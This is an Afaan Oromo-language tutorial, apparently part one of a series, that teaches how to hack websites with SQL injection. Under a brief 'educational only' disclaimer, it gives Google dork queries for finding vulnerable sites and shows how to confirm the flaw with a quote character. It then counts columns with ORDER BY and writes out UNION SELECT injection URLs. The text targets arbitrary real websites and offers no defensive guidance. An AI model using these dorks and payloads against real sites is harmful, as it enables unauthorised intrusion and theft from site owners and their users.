Maxxansa kana dubbistee miidhaa kamiiyyuu marsaalee garagaraa irratti yoo kan adeemsiftu taate, nuti itti gaafatamummaa kan hin fudhanne tahuu isin beeksifna. kaayyoon barreeffama kanaa barnoota isin barsiisuuf qofaadha!!

Har’a akkaataa website garagaraa tooftaa SQL injection jedhamu fayyadamuun hack ittiin godhuun danda’amu haala salphaa fi ifa ta’een barreessuuf yaalee jira dubbisaa.

SQL injection jechuun maali?

SQL injekshiiniin tooftaa jaalatamaa marsaalee ittiin hack godhaniidha. Hackern tokko dadhabina weebsaayitii hack godhu san fayyadamuun tooftaa koodii hamaa (malicious code) gara URL fi database websaayitichaatti galchuudha. Tooftaa kanaan DataBase keessa waan seentuuf MySQL cufuudhaan weebsaayitichi akka hin hojjanne gochuun ni danda’ama.

Jalqaba weebsaayitii kamiinuu karaa SQL injection fayyadamnee hack gochuun dura; weebsaayite karaa kanaan nuuf hack ta’u barbaanna. Kanas wanta google dork jedhamu fayyadamuun barbaanna.

Google dork keessatti barbaaduuf; jalqaba gara google.com deemuun koodii muraasa armaan gaditti an barreesse keessa tokko fayyadamuun barbaanna.

• inurl:index.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=
• inurl:pageid=

Koodota armaan olii kanaan websaayitiile kumaatamatti laakka’aman argattu. Isaan keessaa kan filannoo keessanii tokko filattu. Fknf; www.targetwebsite.com/index.php?id=8 kana filattan haa jennuu.

Dadhabina websaayitii kanaa ilaaluuf mallattoo hudhaa(‘) dabaluun ilaalta. Fknf; www.targetwebsite.com/index.php?id=8' itti aansuun enter tuqi erga barreesitee booda.

Yoo websaaytichi akka duraatti hojjate tooftaa kanaan hack hin ta’u jechuudha. Yoo barreeffama dogongoraa(error) kan akka armaan gadii kana fide ni ta’a jechuudha.

An error occurred… You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”/ contentPage.php?id=8”’ at line 1

Amma kan barbaannu baay’ina irraan-gadee(coloumn) barbaanna. Kanas iddoo mallattoo hudhaa balleessuun jecha Order by no jedhu kana daddabaluun hanga jechi Unknown coloumn jedhu dhufutti barbaanna. Fkn armaan gadii kana ilaali.

• www.targetwebsite.com/ index.php?id=8 Order by 1
• www.targetwebsite.com/ index.php?id=8 Order by 2

Yoo tooftaa armaan olii kanaan dogongora homaatuu hin arganne ta’e; tooftaa itti aanu kanaan ilaalla.

• www.targetwebsite.com/ index.php?id=8 order by 1–
• www.targetwebsite.com/ index.php?id=8 order by 2–

Websaayitichi kun order by 5 irratti dogongora(error) yoo agarsiise baay’ina coloumn 4 qaba jechuudha. Yoo jaha irratti agarsiise 5 qaba jechuudha. An akka baay’inni coloum 11 ta’eetti fudhadhee jira.

Haala milkaa’aa taheen baayina coloumn yoo arganne; itti aansuun coloumn nuuf attack ta’u querry fayyadamuun barbaanna. Fkn kana gadii ilaali.

www.targetwebsite.com/ index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11–

Yoo kanaan mul’isuu dide haala itti aanu kanaan barbaanna. Fknf:

www.targetwebsite.com/ index.php?id=-8 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11–

KUTAA 2FFAA FI ISA XUMUTAAN HANGA WALITTI DEEBINUTTI NAGAYATTI